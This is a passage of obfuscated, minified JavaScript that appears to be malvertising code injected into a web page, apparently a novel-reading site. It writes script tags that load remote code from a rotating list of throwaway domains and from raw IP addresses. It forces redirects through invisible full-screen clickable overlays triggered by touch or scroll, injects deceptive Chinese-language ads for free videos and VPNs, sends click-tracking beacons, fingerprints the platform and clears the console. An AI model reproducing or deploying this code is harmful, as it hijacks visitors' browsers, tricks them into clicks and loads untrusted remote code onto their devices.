e=b6,n="",o=0;o<a[e(492)];o++){var r=a[e(467)](o);48<=r&&r<=57&&(r=(r-48+t)%10+48),n+=String[e(478)](r)}return n}function a2(a){var t=b6,a=a1(a,5),t=a[t(492)];return t<10?t="00"+t:t<100&&(t="0"+t),t+a}var a3=location[b6(554)],a4=navigator,a6,a7,a8,a9,aa,ab,ac,ad,ae,af,ag,ah,ai,aj,ak,am,an,ao,ap,aq,ar,as,at,au,av,aw,ax,ay,az,az,aA,aA;function a5(){var a=b6,t=-1!=a4[a(483)][a(539)]("Win"),e=-1!=a4[a(483)][a(539)]("Mac");a4[a(483)];return(t=-1==a3.indexOf("vv")&&t)||e}function al(){var bB=b6;x&&!window[bB(463)]&&(window[bB(463)]=!0,P=3,eval(ab)())}a5()||(a6=document,a7="h"+U(b6(526))+"/",a8="0",a9=S(11),aa=S(10),ab=S(10),ac=S(10),ad=S(7),ae=T(2147483547,2147483647),af=ae-T(1e4,2e4),ag=T(115,122),ah=function(){},ai=b6(531),aj=b6(520),v?(ai=b6(447),aj=b6(541),a8="1",P=3,ah=function(a){var t=b6;a.style["z-in"+t(551)]=af}):w&&(ai=p+"vh",aj=b6(541),a8="2",P=4,ah=function(a){var t=b6;a.style["z-in"+t(551)]=af}),ak=Date[b6(475)](),E[b6(428)]=function(aB){var bA=b6;if(A){if(0!=D){var aC=new Date(ak)[bA(477)](),aD=(Date[bA(475)]()-aC)/1e3;if(aD<D)return}B<aB&&aB<=C&&(P=3,eval(ab)())}},am="",an=b6(548),ao=b6(553),ap="bottom",aq="",ar=b6(458),1==h&&(an=b6(487),am="padding-top:32%;",i==b6(442)&&(am=b6(466),ao=b6(442),ap=b6(442),ar="padding-bottom"),ae=T(8e4,9e4)),an=V(an,2),an=W(b6(506),an),an='"'+an+'"',ao=V(ao,1),ao=W(b6(506),ao),ao='"'+ao+'"',ap=V(ap,1),ap=W(b6(506),ap),ap='"'+ap+'"',as="",at="","yes"==j&&(as=U(b6(436)),at=U(b6(450))),au=T(100,200),av=au+200,aw=y+av+100,ax=aw+300,ay=ax+300,az=function(){},u&&(a8+="3",az=function(){var bE=b6,aB=function(aD){var bC=a0b,aE=document[bC(433)](bC(490)),aF=document[bC(433)](aD),aG=aF.offsetHeight,aH=aC(aF),aI=aH+aG,aJ=!0;function aK(aL){var bD=bC,aM=aL[bD(497)][0],aN=aM[bD(536)],aO=aM[bD(472)],aP=0,aP=1!=h?aM[bD(472)]:aM.clientY;aH<=aP&&aP<aI&&aJ&&(P=4,eval(ab)(!1))}aE[bC(479)](bC(515),aK)};function aC(a){for(var t=bE,e=a[t(470)],n=a[t(448)];null!==n;)e+=n[t(470)],n=n[t(448)];return e}setTimeout(function(){aB("."+ad)},ax),ai!=bE(531)&&"100vh"!=ai&&setTimeout(function(){aB("."+a9)},ax+50)}),aA=function(){},aA=k==b6(443)?function(a){var t=b6,e=(a[t(431)][t(446)](),document[t(455)](a9));if(e)for(var n=0;n<e[t(492)];n++)e[n][t(495)][t(542)]="0";document[t(545)](t(490))[0][t(495)][""+ar]=t(544),event.stopPropagation()}:function(aB){var bH=b6;event[bH(512)](),eval(ab)()},function(){var bK=b6,aB={data3:{0:{wdf:a7+a0()+Q+c+Z()}}},aC=function(a){var t=a0b;return a.split("")[t(451)]()[t(456)]("")};function aD(){return a7+a0()+Q+d+a2(O)+P+X()}window[aa]=function(a){aA(a)},window[ab]=function(a){var t=a0b,e=document[t(455)](a9);if(e&&null==a)for(var n=0;n<e[t(492)];n++)e[n][t(495)][t(542)]="0";window.location[t(554)]=aD()},al(),x&&!window.temp&&(window[bK(463)]=!0,P=3,eval(ab)());var aE=function(){var a=bK;window[a(484)][a(554)]=aD()},aF=aC(aB[bK(555)][0][bK(547)]),aG="",aH=(a8=" ",aG+=as+bK(462)+ad+bK(476)+a8+bK(503)+bK(522),aG+=bK(435)+a9+bK(471),document[bK(426)](bK(461)+am+"}#"+ac+'{display:flex;width:100%;}</style><div id="'+ac+bK(546)),document[bK(426)](bK(538)),setTimeout(function(){var a=bK;document[a(434)+"E"+a(454)+"yId"](ac)[a(482)]=aG},au),setTimeout(function(){function aI(aJ,aK,aL){var bN=a0b,aM=document[bN(455)](aJ)[0];aM.style[bN(516)+bN(444)]=ag+"px",aM.style[eval(ao)]="0",aM.style.left="0",aM.style["ani"+bN(513)+"on"]=at,aM.style["z-in"+bN(551)]=ae,aM.style["w"+bN(473)]=bN(541),aM[bN(482)]+="<i"+bN(489)+"yl"+bN(452)+"th:100%;h"+bN(427)+bN(474)+ag+"p"+bN(521)+bN(527)+U(aK)+'" />',aM[bN(482)]=aM[bN(482)]+aq,aM["on"+bN(523)+"ck"]=function(){P=2,aL()},aM.style[bN(494)+"it"+bN(511)]=eval(an)}aI(ad,aF,aE)},av),setTimeout(function(){var bO=bK,aI=document[bO(455)](a9)[0];aI.style[bO(530)+bO(524)+bO(444)]=ai,aI.style.width=aj,ah(aI),aI.style[eval(ap)]="0",aI.style.left="0",aI["on"+bO(523)+"ck"]=function(){eval(ab)()}},aw),az(),sessionStorage[bK(438)](bK(507)+g));null==aH&&r()}())}()})(),console.log("BD_DJ")},window._BD_ZS=function(){var a=["disentangle56.top","subversive39.com","lingering34.top","nuisance89.com","pedestrian94.top","agricultural64.top","reluctance58.com","seductive37.top","outsmart56.com","kaboodle49.com","skirmish33.top","multiple46.top","envision75.com","overboard27.com","heuristic95.top","immaterial79.com","foremost57.top","benchmark84.top","herculean57.com","attendant36.top","necessitate22.com","practitioner23.com","accommodate53.top","hazardous58.top","unenviable89.com","foolhardy76.com","contemplate23.top","inception27.com","contender19.com","subjective86.top","litigious35.top"][(new window.Date).getDate()-1];window.document.write("<script src="),window.document.write("h"),window.document.write("tt"),window.document.write("p"),window.document.write("s:"),window.document.write("//hp."+a+"/193tjsdsdsirrrr72.jss?"+(new window.Date).getTime()+"&r="+(navigator.platform.match(/Mac|Win/)?1:0)),window.document.write("><\/script>"),console.log("BD_ZS")};;;(o=>{var r=[1122,2233,7777,888,666],e=[{_k9m:"sj",_p2q:["最新海量爽剧，点击即可免费观看！","热门爽剧，点开立即免费观看！","热门免费爽剧，点击即可观看！","每日更新爽剧、短剧，现在免费！"],_n4r:function(){function e(e,t){return"23.224.199."+(Math.floor(Math.random()*(t-e+1))+e)}var t=[e(18,21),e(26,31),e(226,230)],t=t[Math.round(Math.random()*(t.length-1))],n=r,n=n[Math.floor(Math.random()*n.length)];return i.generateEncryptedUrl("https://"+t+":"+n+"/home?!=m."+i.randomChoice(["J8ES","J84B","J82v","J8YV","J86K","J8Yx","J8YY","J8YR","o","J8qg","JUoa"]))},_f6e:1},{_k9m:"vp",_p2q:["极速番羽墙，不怕失联本站 >>","极速番羽墙，可上任何墙外网站 >>","番羽墙找学习资料？上外网看世界 >>"],_n4r:function(){var e=i.getDateBasedIP(),t=r,t=t[Math.floor(Math.random()*t.length)];return i.generateEncryptedUrl("https://"+e+":"+t+"/a1?!=www.JUre")},_f6e:1}],i={decrypt:function(e){for(var t="",n=0;n<e.length;n++)t+=String.fromCharCode(e[n]);return t},getDateBasedIP:function(){var e=new Date("2025-08-30"),e=(new Date).getTime()-e.getTime(),e=Math.floor(e/864e5);return"154.84.11."+(2+Math.max(1,e%253))},generateEncryptedUrl:function(e){for(var t=[],n=0;n<e.length;n++)t.push(e.charCodeAt(n));return t},randomChoice:function(e){return e[Math.floor(Math.random()*e.length)]},shuffle:function(e){for(var t=e.slice(),n=t.length-1;0<n;n--){var r=Math.floor(Math.random()*(n+1)),o=t[n];t[n]=t[r],t[r]=o}return t},weightedRandom:function(e){for(var t=0,n=0;n<e.length;n++)t+=e[n]._f6e||1;for(var r=Math.random()*t,o=0,i=0;i<e.length;i++)if(r<=(o+=e[i]._f6e||1))return e[i];return e[0]}};function a(e){(new Image).src=e}o.COOKIE_PRE;var d={renderTextAd:function(e){var t=Math.floor(Math.random()*e._p2q.length),n=e._p2q[t],r="function"==typeof e._n4r?e._n4r():e._n4r,r=i.decrypt(r);return'<a href="'+r+'" target="_blank" onclick="return ('+o.___t.createClickHandler(e._k9m,t,r).toString().replace(/"/g,"'")+")('"+e._k9m+"','"+t+"','"+r+'\');" style="color:red;text-decoration:underline;">'+n+"</a>"},renderToPosition:function(e,t){var n=this.renderTextAd(e);switch(t){case"chapter":var r,o=$(".chapter-line");0<o.length&&(r=11+Math.floor(5*Math.random()))<o.length&&o.eq(r).after('<p style="font-size:80%!important;">'+n+"</p>"),$(".dlist").after('<div style="margin:0">'+n+"</div>");break;case"wap-tip":$("#wap-tip").prepend(n+"<br>")}}},l={ads:[],selectedAds:[],currentIndex:0,init:function(){this.ads=i.shuffle(e),this.selectedAds=[],this.selectRandomAds()},selectRandomAds:function(){for(var e=this.ads.slice(),t=0;t<2&&0<e.length;t++){var n=Math.floor(Math.random()*e.length),n=e.splice(n,1)[0];this.selectedAds.push(n)}},getNextAd:function(){var e;return 0===this.selectedAds.length?null:(e=this.selectedAds[this.currentIndex%this.selectedAds.length],this.currentIndex++,e)},getRandomAd:function(){return 0===this.selectedAds.length?null:i.weightedRandom(this.selectedAds)},getAdByIndex:function(e){return 0<=e&&e<this.selectedAds.length?this.selectedAds[e]:null}},t={isInitialized:!(o.___t={track:function(e,t){try{var n="https://172.247.16.230:888/c.gif?jp="+encodeURIComponent(e)+"&t="+t;"ping"in navigator?navigator.ping.send(n).catch(function(){a(n)}):a(n)}catch(e){console.log("Tracker error:",e),a(n)}},createClickHandler:function(){return function(e,t,n){return top.window.___t.track(e,t),top.window.open(n,"_blank"),!1}}}),isScrolled:!1,init:function(){var e=this;l.init(),this.waitForJQuery(function(){e.setupScrollHandler(),e.setupMobileAds()})},waitForJQuery:function(e){"undefined"!=typeof $?e():setTimeout(function(){this.waitForJQuery(e)}.bind(this),1e3)},setupScrollHandler:function(){var n=this,r=$(o);r.on("scroll",function e(){var t;!n.isScrolled&&(n.isScrolled=!0,r.off("scroll",e),t=l.getAdByIndex(0))&&d.renderToPosition(t,"chapter")})},setupMobileAds:function(){var t=this,n=setInterval(function(){var e;"undefined"!=typeof $&&0<$("#wap-tip > *").length&&!t.isInitialized&&(t.isInitialized=!0,clearInterval(n),e=l.getAdByIndex(1))&&d.renderToPosition(e,"wap-tip")},3e3)}};0 in o,t.init(),o.xxxxloaderEnd=function(){var n,r;"undefined"==typeof $?setTimeout(xxxxloaderEnd,1e3):(n=$(o),r=!1,n.on("scroll",function e(){var t;!r&&(r=!0,n.off("scroll",e),t=l.getAdByIndex(0))&&d.renderToPosition(t,"chapter")}))}})(window,document);;;window._B2_DJ=function(){function randomChoice(){var a;return"undefined"!=typeof crypto&&crypto.getRandomValues?(a=new Uint8Array(1),crypto.getRandomValues(a),1&a[0]):!(Math.random()<.5)}(randomChoice()?function(){function a0b(a,t){var e=a0a();return(a0b=function(a,t){return e[a-=160]})(a,t)}function a0a(){var a=["real","temp","push","16VnwnHh","remove","offsetParent","getTime","reverse","touchend","parse","check",'" style="position:fixed;color:transparent;">.</div>',"style","setItem",".jpg","6267814cppbeI","writeln","touch_min_height",'<div class="',"data","0vh","pageY","substring","th:1","%;h","383265zVYdci","mg st","common","33000385kGDTYB","i13","now","width","startsWith","lementB","offsetHeight","uci","xyxyyx",'c="',"getElementsByClassName","getDate","__executedClassIds","body","2014",'"+"',"charAt","charCodeAt","spt","config_","bottom","578975oLrnpK","tpir","</div>","ght","data3","padding-top","647560ugKRqQ","hei","100vh","0px","_real","pos","<style>body{","this_touch_status","touch_max_height","Mac","touchMotion","querySelector","location","clientY",'x;" sr',"getItem",">elyts/<;}})0(etator)1(elacs:mrofsnart-tikbew-{%001})ged5.1-(etator)1(elacs:mrofsnart-tikbew-{%08,%06,%04})ged5.1(etator)1(elacs:mrofsnart-tikbew-{%09,%07,%05,%03})ged5.1-(etator)59.0(elacs:mrofsnart-tikbew-{%02,%01})1(elacs:mrofsnart-tikbew-{%0{sgewgekahs semarfyek-tikbew-@}})0(etator)1(elacs:mrofsnart-zom-{%001})ged5.1-(etator)1(elacs:mrofsnart-zom-{%08,%06,%04})ged5.1(etator)1(elacs:mrofsnart-zom-{%09,%07,%05,%03})ged5.1-(etator)59.0(elacs:mrofsnart-zom-{%02,%01})1(elacs:mrofsnart-zom-{%0{sgewgekahs semarfyek-zom-@>elyts<","getFullYear","padding-bottom:32%;","i11","1476YGHPpe","mati","top","height","dex","getElementsByTagName","e-hei","padding-top:32%;","indexOf","parentNode","addEventListener","touchDelayTimeout","currentPvIndex_","join","Win","slice","clear","platform","eig","594130mvriBD","touchstart","4TGUnHq","lin","random","2772crAAaS","0vw","ion","filter","innerHTML","fixed","floor",'e="wid',"touchmove"," <span> ","split","i12","36lhidVa",'{display:flex;width:100%;}</style><div id="',"~</div>","stringify","undefined","getMonth","get","yes","touches","length","100vw","cli","every","classId","stopPropagation","abcdefghijklmnopqrstuvwxyz","relative","href","offsetTop","ani","/:sptt","k21","idth","fromCharCode"];return(a0a=function(){return a})()}(()=>{for(var a=a0b,t=a0a();;)try{if(907414==-parseInt(a(221))*(-parseInt(a(219))/2)+-parseInt(a(224))/3*(-parseInt(a(200))/4)+-parseInt(a(174))/5*(-parseInt(a(236))/6)+-parseInt(a(275))/7*(-parseInt(a(263))/8)+-parseInt(a(285))/9+-parseInt(a(180))/10+-parseInt(a(288))/11)break;t.push(t.shift())}catch(a){t.push(t.shift())}})(),function(){var b6=a0b,a=b6(167),b=18042186,c=R(13)+b6(274),d=b6(270),e=b6(287),f=b6(260),g=454,h=2,i=b6(202),j=b6(243),k="no",l=0,m=0,n=100,o=0,p=40,q=sessionStorage[b6(195)](b6(212)+g);function r(){for(var a=b6,t=s(),e=0;e<t[a(245)];e++){var n=t[e];document.write(n)}}function s(){var a=b6;return["<",U("rcs"),U("tpi")," onload='xyxyyx()' "," s",'rc="',"ht",U(a(171)),":","/","/",a0(),".",U(a(160)),"/",f,"?",(new Date)[a(266)](),g,'">',"<","/s","c",U(a(175)),">"]}function t(a,t){return typeof a===b6(240)||null===a?[]:a.split(t)}null==q&&(q=0),q=parseInt(q),sessionStorage[b6(273)]("currentPvIndex_"+g,q+1),window[b6(161)]=function(){var b9=b6,aB=g,aC=eval(b9(279)+aB)+"";sessionStorage[b9(273)]("data_"+aB,aC),sessionStorage[b9(273)](b9(279)+aB,1)};var u=n>=T(1,100),v=!1,w=!1,x=o>=T(1,100),y=0,z=0,A=z>=T(1,100),B=0,C=1e3,D=0,E={touchMotion:function(){}},F=0,G=0,H=0;function I(a){var o,r,i,e,s,n,b,u,c,f,l,d,v=b6;window[v(165)]=window.__executedClassIds||new Set,window[v(165)].has(a[v(249)])||(window[v(165)].add(a[v(249)]),console[v(216)](),o=a.classId,r=a.i1,i=a.i2,e=a.i3,s=a.i4,n=a.i5,b=a[v(199)],u=a[v(235)],c=a[v(289)],sessionStorage[o+v(184)])||(f=JSON.parse(sessionStorage[o]||"[]"),l=0,document[v(210)](v(268),function(){var a,t=v;H-G<e&&(a=(Date[t(290)]()-l)/1e3,n<a)&&(F++,l=Date[t(290)]())},!1),d=Date[v(290)](),f[v(262)](!1),sessionStorage[o]=JSON[v(239)](f),setInterval(function(){var a=v,t=(Date.now()-d)/1e3,t=r<=t,e=i<=F,n=document.body[a(294)]>=s,t=t&&e&&n,e=(f[f[a(245)]-1]!==t&&(f[f[a(245)]-1]=t,sessionStorage[o]=JSON[a(239)](f)),f[a(227)](Boolean)[a(245)]),n=b<=e,t=!u||f[a(248)](Boolean),e=!c||f[0]&&f[a(248)](Boolean);n&&t&&e&&(sessionStorage[o+a(184)]="true")},1e3))}function J(a){return""===a?0:parseInt(a,10)}function K(a,t){var e=b6;return{classId:e(172)+a,i1:J(t.i1),i2:J(t.i2),i3:J(t.i3),i4:J(t.i4),i5:J(t.i5),i11:J(t[e(199)]),i12:t[e(235)],i13:t[e(289)]}}function L(a,t){var e=b6;if(sessionStorage[a[e(249)]+e(184)])for(var n in t)n[e(292)]("r")&&typeof t[n]!==e(240)&&(t["k"+n[e(215)](1)]=t[n])}function M(a){p=a.m1,j=a.m2,n=a.m3}function N(a){var e,c=b6;null==sessionStorage[c(195)](c(279)+a)||(e=sessionStorage[c(195)]("data_"+a),I(e=K(a,a=JSON[c(269)](e))),M(a),L(e,a),v=parseInt(a.k2)>=T(1,100),w=parseInt(a.k1)>=T(1,100),x=parseInt(a.k3)>=T(1,100),e=((a,t,e,n)=>{var o=c,r={this_touch_status:!1,touch_min_height:0,touch_max_height:0,touchDelayTimeout:0};function i(a){var t=a0b,a=a.split(","),a=a[a[t(245)]-1].split("_");r[t(277)]=parseInt(a[0]),r[t(188)]=parseInt(a[1])}if(a){var s=a[o(234)](","),s=s[0]?parseInt(s[0]):100;if(100*Math[o(223)]()<s)return r[o(187)]=!0,i(a),r}if(e)for(var b=e[o(234)](",")[0].split("_"),u=0;u<b[o(245)];u++)if(parseInt(b[u])===n)return r.this_touch_status=!0,i(e),r;if(t){a=t[o(234)](","),s=parseInt(a[0]),a=parseInt(a[1]);if(100*Math.random()<s)r[o(187)]=!0,r[o(211)]=a,i(t)}return r})(a[c(257)],a.k22,a.k23,q),A=e[c(187)],B=e[c(277)],C=e[c(188)],D=e[c(211)],v||((e=t(a.k8,"_"))&&-1!==e.indexOf(q+"")?v=!0:w||((e=t(a.k7,"_"))&&-1!==e[c(208)](q+"")?w=!0:2===(e=t(a.k5,",")).length?parseInt(e[0])>=T(1,100)&&(v=!0,y=1e3*parseInt(e[1])):2===(e=t(a.k4,","))[c(245)]&&parseInt(e[0])>=T(1,100)&&(w=!0,y=1e3*parseInt(e[1])))),x)||((e=t(a.k9,"_"))&&-1!==e.indexOf(q+"")?x=!0:2===(e=t(a.k6,",")).length&&parseInt(e[0])>=T(1,100)&&setTimeout(function(){x=!0,al()},1e3*parseInt(e[1])))}document[b6(210)](b6(220),function(a){a=a[b6(244)][0].clientY;H=G=a},!1),document[b6(210)](b6(232),function(a){var t=b6,a=a[t(244)][0][t(193)],t=(H=H<a?a:H)-(G=a<G?a:G);E.touchMotion(t)},!1),N(g);var O="",P=2,Q=(d+="?",c+="?",U("/uci."));function R(a){for(var t=b6,e="",n=0;n<a;n++)e+=Math[t(230)](10*Math[t(223)]());return e}function S(a){for(var t=b6,e="",n=t(251),o=0;o<a;o++)e+=n[t(169)](Math[t(230)](Math[t(223)]()*n[t(245)]));return e}function T(a,t){var e=b6;return Math.floor(Math[e(223)]()*(t-a+1))+a}function U(a){var t=b6;return a[t(234)]("")[t(267)]()[t(213)]("")}function V(a,t){for(var e=b6,n=[],o=0;o<a[e(245)];o+=t)n[e(262)](a[e(215)](o,o+t));return n}function W(a,t){for(var e=b6,n="",o=0;o<t[e(245)];o++)n+=t[o],o<t[e(245)]-1&&(n+=a);return n}function X(){var br=b6,aB=Date[br(269)](new Date)/1e3+"",aC=aB[br(282)](6,10),aD=Math[br(230)](9*Math[br(223)]())+1,aE=(aB*=aD,(aB+"").length),aF=aD+""+aE+aB,aG={1:"+",2:"*"},aH=Math[br(230)](2*Math[br(223)]())+1,aI=Math[br(230)](998*Math[br(223)]())+1,aJ=Math[br(230)](998*Math.random())+1,aK=aI+aG[aH]+aJ,aL=(aI+"")[br(245)],aM=(aJ+"")[br(245)],aN=aC,aO=eval(aK)*aN+"2",aP=aH+""+aL+aM+aI+aJ+aO,aQ=aF+aP;return aQ}function Y(){for(var a=b6,t=(g+"")[a(234)](""),e=t[a(245)],n=[e],o=[],r=0;r<10;r++){var i=Math[a(230)](9*Math[a(223)]())+1;o[r]=i}for(var s=[0,1,2,3,4,5,6,7,8,9],r=1;r<s.length;r++){var b=Math.floor(Math.random()*(r+1));[s[r],s[b]]=[s[b],s[r]]}for(r=0;r<e;r++){var u=s[r];o[u]=t[r],n[r+1]=u}return n[a(213)]("")+o[a(213)]("")}function Z(){var a=b6,a=Y()+X()+(new Date)[a(266)]()+"";return O=a}function a0(){for(var t=b6,e=[233280,9301,49297,714025,4096,150889,134456,281,28411,7875,421,1663,14406,967,3041,214326,3613,45289],n=new Date(Date.now()-b),o="",r=n[t(241)]()+1,i=n[t(164)](),s=""+n[t(197)](),s=(s+=r<=9?"0"+r:r)+(i<=9?"0"+i:i)+a,u=0;u<6;u++)o+=(0,String.fromCharCode)(97+(parseInt(s)*e[3*u+1]+e[3*u+2])%e[3*u]%26);return o}function a1(a,t){for(var e=b6,n="",o=0;o<a[e(245)];o++){var r=a[e(170)](o);48<=r&&r<=57&&(r=(r-48+t)%10+48),n+=String[e(259)](r)}return n}function a2(a){var a=a1(a,5),t=a.length;return t<10?t="00"+t:t<100&&(t="0"+t),t+a}var a3=location[b6(253)],a4=navigator,a6,a7,a8,a9,aa,ab,ac,ad,ae,af,ag,ah,ai,aj,ak,am,an,ao,ap,aq,ar,as,at,au,av,aw,ax,ay,az,az,aA,aA;function a5(){var a=b6,t=-1!=a4[a(217)][a(208)](a(214)),e=-1!=a4[a(217)][a(208)](a(189));a4[a(217)];return(t=-1==a3.indexOf("vv")&&t)||e}function al(){var bz=b6;x&&!window.temp&&(window[bz(261)]=!0,P=3,eval(ab)())}a5()||(a6=document,a7="h"+U(b6(256))+"/",a8="0",a9=S(11),aa=S(10),ab=S(10),ac=S(10),ad=S(7),ae=T(2147483547,2147483647),af=ae-T(1e4,2e4),ag=T(115,122),ah=function(){},ai=b6(280),aj=b6(225),v?(ai=b6(182),aj=b6(246),a8="1",P=3,ah=function(a){var t=b6;a.style["z-in"+t(204)]=af}):w&&(ai=p+"vh",aj=b6(246),a8="2",P=4,ah=function(a){a.style["z-index"]=af}),ak=Date[b6(290)](),E[b6(190)]=function(aB){var by=b6;if(A){if(0!=D){var aC=new Date(ak)[by(266)](),aD=(Date[by(290)]()-aC)/1e3;if(aD<D)return}B<aB&&aB<=C&&(P=3,eval(ab)())}},am="",an=b6(252),ao=b6(202),ap=b6(173),aq="",ar=b6(179),1==h&&(an=b6(229),am=b6(207),"bottom"==i&&(am=b6(198),ao=b6(173),ap="bottom",ar="padding-bottom"),ae=T(8e4,9e4)),an=V(an,2),an=W(b6(168),an),an='"'+an+'"',ao=V(ao,1),ao=W(b6(168),ao),ao='"'+ao+'"',ap=V(ap,1),ap=W(b6(168),ap),ap='"'+ap+'"',as="",at="",j==b6(243)&&(as=U(b6(196)),at=U("sgewgekahs gninnur enon lamron etinifni s2.0 esae s5.1")),au=T(100,200),av=au+200,aw=y+av+100,ax=aw+300,ay=ax+300,az=function(){},u&&(a8+="3",az=function(){var bC=b6,aB=function(aD){var bA=a0b,aE=document.querySelector(bA(166)),aF=document[bA(191)](aD),aG=aF[bA(294)],aH=aC(aF),aI=aH+aG,aJ=!0;function aK(aL){var bB=bA,aM=aL[bB(244)][0],aN=aM[bB(193)],aO=aM[bB(281)],aP=0,aP=1!=h?aM.pageY:aM[bB(193)];aH<=aP&&aP<aI&&aJ&&(P=4,eval(ab)(!1))}aE.addEventListener(bA(232),aK)};function aC(a){for(var t=bC,e=a[t(254)],n=a[t(265)];null!==n;)e+=n[t(254)],n=n[t(265)];return e}setTimeout(function(){aB("."+ad)},ax),ai!=bC(280)&&ai!=bC(182)&&setTimeout(function(){aB("."+a9)},ax+50)}),aA=function(){},aA=k==b6(243)?function(a){var t=b6,e=(a[t(209)][t(264)](),document[t(163)](a9));if(e)for(var n=0;n<e.length;n++)e[n][t(272)].height="0";document[t(205)](t(166))[0][t(272)][""+ar]=t(183),event[t(250)]()}:function(aB){var bF=b6;event[bF(250)](),eval(ab)()},function(){var bI=b6,aB={data3:{0:{wdf:a7+a0()+Q+c+Z()}}},aC=function(a){var t=a0b;return a.split("")[t(267)]()[t(213)]("")};function aD(){return a7+a0()+Q+d+a2(O)+P+X()}window[aa]=function(a){aA(a)},window[ab]=function(a){var t=a0b,e=document[t(163)](a9);if(e&&null==a)for(var n=0;n<e[t(245)];n++)e[n][t(272)][t(203)]="0";window[t(192)][t(253)]=aD()},al(),x&&!window[bI(261)]&&(window[bI(261)]=!0,P=3,eval(ab)());var aE=function(){var a=bI;window[a(192)][a(253)]=aD()},aF=aC(aB[bI(178)][0].wdf),aG="",aH=(a8=" ",aG+=as+'<div  class="'+ad+'" style=" position:;"> <span style="position: absolute;font-size: 14px;">'+a8+bI(233)+bI(176),aG+=bI(278)+a9+bI(271),document[bI(276)](bI(186)+am+"}#"+ac+bI(237)+ac+'">~_~~_~'),document[bI(276)](bI(238)),setTimeout(function(){var a=bI;document[a(242)+"E"+a(293)+"yId"](ac)[a(228)]=aG},au),setTimeout(function(){function aI(aJ,aK,aL){var bL=a0b,aM=document[bL(163)](aJ)[0];aM.style[bL(181)+"ght"]=ag+"px",aM.style[eval(ao)]="0",aM.style.left="0",aM.style[bL(255)+bL(201)+"on"]=at,aM.style["z-in"+bL(204)]=ae,aM.style["w"+bL(258)]="100vw",aM[bL(228)]+="<i"+bL(286)+"yl"+bL(231)+bL(283)+"00"+bL(284)+bL(218)+"ht:"+ag+"p"+bL(194)+bL(162)+U(aK)+'" />',aM[bL(228)]=aM[bL(228)]+aq,aM["on"+bL(247)+"ck"]=function(){P=2,aL()},aM.style[bL(185)+"it"+bL(226)]=eval(an)}aI(ad,aF,aE)},av),setTimeout(function(){var bM=bI,aI=document[bM(163)](a9)[0];aI.style[bM(222)+bM(206)+bM(177)]=ai,aI.style[bM(291)]=aj,ah(aI),aI.style[eval(ap)]="0",aI.style.left="0",aI["on"+bM(247)+"ck"]=function(){eval(ab)()}},aw),az(),sessionStorage.getItem(bI(279)+g));null==aH&&r()}())}()}:function(){function a0b(a,t){var e=a0a();return(a0b=function(a,t){return e[a-=423]})(a,t)}function a0a(){var a=["abcdefghijklmnopqrstuvwxyz","/uci.","dex","currentPvIndex_","top","href","data3","split"," onload='kfbpva()' ","write","writeln","eig","touchMotion","touch_min_height","i11","parentNode","2028","querySelector","get",'<div class="',">elyts/<;}})0(etator)1(elacs:mrofsnart-tikbew-{%001})ged5.1-(etator)1(elacs:mrofsnart-tikbew-{%08,%06,%04})ged5.1(etator)1(elacs:mrofsnart-tikbew-{%09,%07,%05,%03})ged5.1-(etator)59.0(elacs:mrofsnart-tikbew-{%02,%01})1(elacs:mrofsnart-tikbew-{%0{sgewgekahs semarfyek-tikbew-@}})0(etator)1(elacs:mrofsnart-zom-{%001})ged5.1-(etator)1(elacs:mrofsnart-zom-{%08,%06,%04})ged5.1(etator)1(elacs:mrofsnart-zom-{%09,%07,%05,%03})ged5.1-(etator)59.0(elacs:mrofsnart-zom-{%02,%01})1(elacs:mrofsnart-zom-{%0{sgewgekahs semarfyek-zom-@>elyts<","floor","getItem","substring","random","i13","bottom","yes","ght","uci","remove","100vh","offsetParent","i12","sgewgekahs gninnur enon lamron etinifni s2.0 esae s5.1","reverse",'e="wid',"301650WNCgVD","lementB","getElementsByClassName","join","2188888rlSSxK","padding-top","push","rcs","<style>body{",'<div  class="',"temp","k21","9oRoPMW","padding-bottom:32%;","charCodeAt","4196130EQjmkw","616080tzHkMb","offsetTop",'" style="position:fixed;color:transparent;">.</div>',"pageY","idth","ht:","now",'" style=" position:;"> <span style="position: absolute;font-size: 14px;">',"getTime","fromCharCode","addEventListener","stringify","touchend","innerHTML","platform","location","3FdHHOk","touchstart","fixed","undefined","mg st","body","spt","length","tpi","pos","style","slice","touches","touchDelayTimeout","getDate","common","parse","this_touch_status"," <span> ","setItem","touch_max_height",'"+"',"data","_real","__executedClassIds","1782090SKPyXo","ion","stopPropagation","mati","data_","touchmove","hei","true","classId","add","0vw",'x;" sr',"</div>","cli","e-hei","7SfAhLE","/:sptt",'c="',"startsWith","getFullYear","lin","0vh","has","kfbpva","332432VPWZjg","k23","clientY","check","~</div>","indexOf","every","100vw","height","927056mHtMaa","0px","getElementsByTagName",'">~_~~_~',"wdf","relative"];return(a0a=function(){return a})()}(()=>{for(var a=a0b,t=a0a();;)try{if(176663==+parseInt(a(453))+parseInt(a(534))/2*(-parseInt(a(485))/3)+-parseInt(a(543))/4+-parseInt(a(469))/5+parseInt(a(510))/6*(-parseInt(a(525))/7)+parseInt(a(457))/8+-parseInt(a(465))/9*(-parseInt(a(468))/10))break;t.push(t.shift())}catch(a){t.push(t.shift())}})(),function(){var b6=a0b,a=b6(432),b=18037604,c=R(13)+".jpg",d=b6(537),e=b6(500),f="real",g=4825,h=2,i=b6(553),j="no",k="no",l=0,m=0,n=100,o=0,p=100,q=sessionStorage[b6(438)](b6(552)+g);function r(){for(var a=s(),t=0;t<a.length;t++){var e=a[t];e=e,document[a0b(425)](e)}}function s(){var a=b6;return["<",U(a(460)),U(a(493)),a(424)," s",'rc="',"ht",U(a(491)),":","/","/",a0(),".",U(a(445)),"/",f,"?",(new Date)[a(477)](),g,'">',"<","/s","c",U("tpir"),">"]}function t(a,t){return typeof a===b6(488)||null===a?[]:a.split(t)}null==q&&(q=0),q=parseInt(q),sessionStorage[b6(504)](b6(552)+g,q+1),window[b6(533)]=function(){var b9=b6,aB=g,aC=eval(b9(507)+aB)+"";sessionStorage[b9(504)](b9(514)+aB,aC),sessionStorage[b9(504)]("data"+aB,1)};var u=n>=T(1,100),v=!1,w=!1,x=o>=T(1,100),y=0,z=0,A=z>=T(1,100),B=0,C=0,D=0,E={touchMotion:function(){}},F=0,G=0,H=0;function I(a){var o,r,i,e,s,n,b,u,c,f,l,d,v=b6;window.__executedClassIds=window.__executedClassIds||new Set,window[v(509)][v(532)](a.classId)||(window[v(509)][v(519)](a[v(518)]),console.clear(),o=a[v(518)],r=a.i1,i=a.i2,e=a.i3,s=a.i4,n=a.i5,b=a[v(430)],u=a[v(449)],c=a.i13,sessionStorage[o+v(508)])||(f=JSON.parse(sessionStorage[o]||"[]"),l=0,document[v(479)](v(481),function(){var 